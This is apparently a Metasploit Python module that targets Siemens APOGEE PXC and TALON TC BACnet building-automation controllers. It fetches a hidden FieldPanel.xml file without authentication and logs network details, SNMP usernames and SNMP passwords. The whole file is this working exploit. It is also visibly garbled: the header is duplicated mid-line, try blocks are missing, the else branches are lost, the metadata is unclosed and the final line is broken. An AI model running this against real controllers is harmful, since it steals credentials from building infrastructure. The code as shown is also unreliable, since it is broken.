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#!/usr/bin/env python3

# -*- coding: utf-8 -*-
# 2022-05-23

# Standard Modules
from metasploit import module

# Extra Dependencies
dependencies_m #!/usr/bin/env python3

# -*- coding: utf-8 -*-
# 2022-05-23

# Standard Modules
from metasploit import module

# Extra Dependencies
dependencies_missing = False
import logging
import requests
import requests
import xmltodict
import xml.etree.ElementTree as ET
import socket
import struct
import requests
except ImportError:
dependencies_missing = True

# Metasploit Metadata
metadata = {
'name': 'Siemens BACnet Field Panel Path Traversal',
'description': '''
This module exploits a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers (all versions prior to V3.5), and TALON TC BACnet Automation Controllers (all versions prior to V3.5). With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or channel to enumerate hidden directories in the web server.
'authors': [
'date': '2022-05-23',
'license': 'MSF_LICENSE',
'references': [
{'type': 'url', 'ref': ''},
{'type': 'cve', 'ref': ''},
'type': 'single_scanner',
'options': {
'rhost': {'type': 'string', 'description': 'Target address', 'required': True, 'default': None},

def run(args):
module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
if dependencies_missing:
logging.error('Module dependency (requests) is missing, cannot continue')

# Download Hidden XML File
r = requests.get('http://{}/{}'.format(args['rhost'], '/FieldPanel.xml'), verify=False)

# Convert to Readable Format
xml_doc = r.content
root = ET.fromstring(xml_doc)

# Parse XML for Sensitive Data
module.log("Remote Site ID: " + root[18].text)
module.log("Building Level Network Name: " + root[26].text)
module.log("Site Name: " + root[27].text)
module.log("Hostname: " + root[28].text)
ip_addr = int(root[30].text, 16)
module.log("IP Address: " + socket.inet_ntoa(struct.pack(">L", ip_addr)))
gw_addr = int(root[32].text, 16)
gw_addr = str(socket.inet_ntoa(struct.pack(">L", gw_addr)))
module.log("Gateway IP Address: " + gw_addr[::-1])
module.log("Maximum Transmission Size: " + root[57].text)
module.log("BACnet Device Name: " + root[60].text)
module.log("BACnet UDP Port: " + root[62].text)
module.log("Device Location: " + root[63].text)
module.log("Device Description: " + root[64].text)
module.log("Device Barcode: " + root[88].text)
module.log("Device Revision String: " + root[104].text)
module.log("Device Firmware: " + root[105].text)
module.log("Panel Key Name: " + root[109].text)
module.log("SNMP Username: " + root[148].text)
module.log("SNMP Private Password: " + root[149].text)
module.log("SNMP Authorization Password: " + root[150].text)

# Determine Running Services
if int(root[48].text) == 1:
module.log("Telnet Enabled")
module.log("Telnet Disabled")

if int(root[84].text) == 1:
module.log("Wireless Enabled")
module.log("Wireless Disabled")

if int(root[103].text) == 3:
module.log("Webserver Enabled")
module.log("Webserver Disabled")

except requests.exceptions.RequestException as e:

if __name__ == '__main__':, run)